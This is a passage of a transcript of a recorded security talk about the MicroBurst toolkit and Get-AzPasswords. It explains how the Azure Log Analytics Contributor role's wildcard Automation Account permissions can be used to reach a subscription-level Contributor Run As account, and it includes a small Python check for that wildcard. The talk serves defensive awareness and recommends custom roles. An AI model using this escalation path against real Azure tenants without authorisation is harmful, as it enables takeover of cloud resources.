So no need to try them; after I made this recording, I immediately deleted everything in that subscription and rotated or deleted any existing credentials, like the service principal. Final note here: now that we understand how to utilize Get-AzPasswords, I wanted to talk about a privilege escalation opportunity in one of the Azure default roles. The Log Analytics Contributor role is something we frequently see for users that need access to the Log Analytics workspaces: it lets you modify the parsing of Log Analytics items, read monitoring data, edit monitoring settings, things like that. As part of that, the role has wildcard Automation Account permissions in its actions wherever it's applied, and we typically see it applied at the subscription level. One thing to keep in mind with Automation Accounts is that by default, those Run As accounts are Contributors on the subscription. Log Analytics Contributor is a slightly limited contributor-style role, more focused on the Log Analytics services: we see things like virtual machine extensions, where you have some options, and you can list keys for storage accounts, but it's not the full set of rights you'd typically see for a Contributor. Using that Log Analytics Contributor role, we can use the Automation Account functionality we talked about earlier to get access to that Contributor Run As account. It's a minor escalation, but it does allow you to move from Log Analytics Contributor up to full subscription-level Contributor. Microsoft actually addressed this recently in their documentation; they intend to remove the Automation Account rights from the Log Analytics Contributor role. I'd recommend using a custom role instead, to apply only the permissions that specific users in the subscription actually need.
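The tell here is the wildcard in the role's action list. A quick Python sketch of spotting Automation permissions in a role definition; the actions list below is a trimmed, illustrative subset rather than the full Log Analytics Contributor definition:

```python
import fnmatch

# Trimmed, illustrative subset of a Log Analytics Contributor style role.
role_actions = [
    "*/read",
    "Microsoft.Automation/automationAccounts/*",
    "Microsoft.Storage/storageAccounts/listKeys/action",
]

def grants(actions, operation):
    # ARM action strings use '*' wildcards; fnmatch approximates the matching
    # ('*' here happily spans '/' separators, like ARM's wildcard does).
    return any(fnmatch.fnmatch(operation, a) for a in actions)

# Enough to create and run a runbook, i.e. reach the Run As contributor account.
print(grants(role_actions, "Microsoft.Automation/automationAccounts/runbooks/write"))
```

Running the same check against something outside the wildcard, like `Microsoft.Compute/virtualMachines/write`, comes back False, which matches the "limited contributor" feel of the role described above.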
So once we have that Run As certificate, we can authenticate as the Run As account, which is a full Contributor, and that can be super handy for escalating privileges. Given that it's not fully addressed in the role yet, I assume it might be viable for a little while longer, but I'm guessing Microsoft is going to fully remove those rights relatively soon, so it's something to keep an eye on. While we do questions here (this is a recording, but we'll leave the information slide up at the end), I just wanted to say a couple of thank-yous. For the MicroBurst contributors: Jake, Josh, Thomas, and the handful of other people who have contributed to the MicroBurst toolset, thanks to all of those folks for their contributions; we talked about several of the functions they've helped out on earlier. Slide design assistance came from Sophia; that's her "MicroBurst with a knife" graphic, and I really like that. And for that basic-auth login trick for App Services, thanks to MCOMI on Twitter, the same person that does StormSpotter; definitely go check that out. And yeah, thanks, everybody. Here's some additional information that we'll leave up during the questions. If you want to access MicroBurst, we've got the link here; my blog posts are also available, including some Get-AzPasswords-specific ones. The slides themselves will be linked from my Twitter; I'll most likely host them in Azure as a PDF. Thanks.